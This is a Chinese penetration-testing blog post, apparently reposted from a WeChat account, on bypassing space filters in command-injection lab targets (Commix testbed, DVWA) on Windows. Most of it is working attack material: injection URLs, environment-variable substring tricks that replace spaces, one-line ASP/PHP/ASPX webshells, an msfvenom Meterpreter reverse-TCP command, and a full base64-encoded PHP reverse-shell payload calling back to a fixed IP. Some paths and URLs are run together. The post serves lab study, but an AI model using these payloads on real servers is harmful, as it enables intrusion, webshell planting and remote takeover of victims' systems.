|
所有话题标签: |
0x01 本地测试环境
操作系统:Windows Server 2008 R2 x64 & Windows 10 Build 17134
测试环境:phpStudy(PHP/5.6.27 + Apache/2.4.23 + MySQL 5.5.53)
测试靶场:Commix testbed(classic_non_space.php)& DVWA Command Injection
项目地址:https://github.com/commixproject/commix-testbed
.commix-testbed-masterscenariosregularGETclassic_non_space.php.commix-testbed-masterscenariosregularPOSTclassic_non_space.php
0x02 代码问题分析
0x03 空格绕过测试
(1) 常规执行方式
http://pentest.com/classic_non_space.php?addr=baidu.com%26whoami
(2) echo输出(过滤空格)
http://pentest.com/classic_non_space.php?addr=baidu.com%26echo commix
(3) echo输出(绕过空格)
http://pentest.com/classic_non_space.php?addr=baidu.com%26echo=commix
-
https://github.com/3had0w/Fuzzing-Dicts/blob/master/Commix -Space(46).txt
echo、type、copy、del、dir、cd、start等,但系统/网络这类命令中的空格都不能用这些符号来代替,如:sc、net、arp、ping、netstat、ipconfig、tasklist、taskkill、traceroute、nslookup等,不过可以使用“环境变量截取”的方式来进行绕过,在后边会讲到这种方法。(4) echo写文件(一句话木马)
1) ^转义符
http://pentest.com/classic_non_space.php?addr=baidu.com%26echo=^<?=phpinfo();?^>>C:phpStudyWWWcommixa.phphttp://pentest.com/classic_non_space.php?addr=baidu.com%26echo="<?=phpinfo();?>">C:phpStudyWWWcommixb.phphttp://pentest.com/classic_non_space.php?addr=baidu.com%26set/p="<?=phpinfo();?>"<nulC:phpStudyWWWcommixc.phpASP:<%execute(request("90sec"))%>PHP:=@eval($_POST["90sec"]);ASPX:<%@Language="Jscript"%><%eval(Request.Item["90sec"],"unsafe");%>
-
https://www.php.net/manual/zh/language.basic-syntax.phptags.php
Metasploit PHP Payload:
生成出来的PHP Payload默认是没有php标识符的,可以自行添加!不过得到的MSF会话会限制了很多命令和扩展的执行,但我们仍然可以执行upload、download、execute等命令,重新上传并执行EXE Payload即可。
msfvenom -p php/meterpreter/reverse_tcp -e php/base64 lhost=192.168.1.120 LPORT=443 -f raw > /tmp/pay.php
=@eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4xMjAnOyAkcG9ydCA9IDQ0MzsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFjaygi.TmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7));
(5) Windows环境变量截取绕过
环境变量截取原理,来自@Destiny老哥分析:%%取环境变量,:截取字符串,~10从前十开始,1代表取1位,-5代表取倒数第5位,更多带空格的环境变量可以通过set命令查看。
path:~10,1%programfiles:~10,1%processor_identifier:~7,1%commonprogramw6432:~10,1%commonprogramfiles(x86):~10,1%commonprogramfiles:~10,1%commonprogramfiles:~10,-18%commonprogramfiles:~23,1%fps_browser_app_profile_string:~8,1%[...SNIP...]
http://pentest.com/classic_non_space.php?addr=|query%path:~10,1%user
0x04 遇到一点问题
1、CMD执行正常C:>ping|net%path:~10,1%user>C:net.txt2、靶场echo正常classic_non_space.php?addr=|echo=net%path:~10,1%user3、靶场执行输出空白classic_non_space.php?addr=|net%path:~10,1%user>C:net.txt4、靶场执行输出正常classic_non_space.php?addr=|query%path:~10,1%user>C:query.txt
0x05 临时解决方案
http://pentest.com/classic_non_space.php?addr=%26echo=net%path:~10,1%user^>netuser.txt>C:netuser.bat2) start=C:netuser.bat & timeout /t 5 /NOBREAK & taskkill /f /im cmd.exe
http://pentest.com/classic_non_space.php?addr=%26start=C:netuser.bat%26timeout%path:~10,1%/t%path:~10,1%5%path:~10,1%/NOBREAK%26taskkill%path:~10,1%/f%path:~10,1%/im%path:~10,1%cmd.exe
0x06 参考链接
https://github.com/commixproject/commixhttps://www.betterhacker.com/2016/10/command-injection-without-spaces.htmlhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
本文始发于微信公众号(潇湘信安):命令注入靶场空格过滤绕过测试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论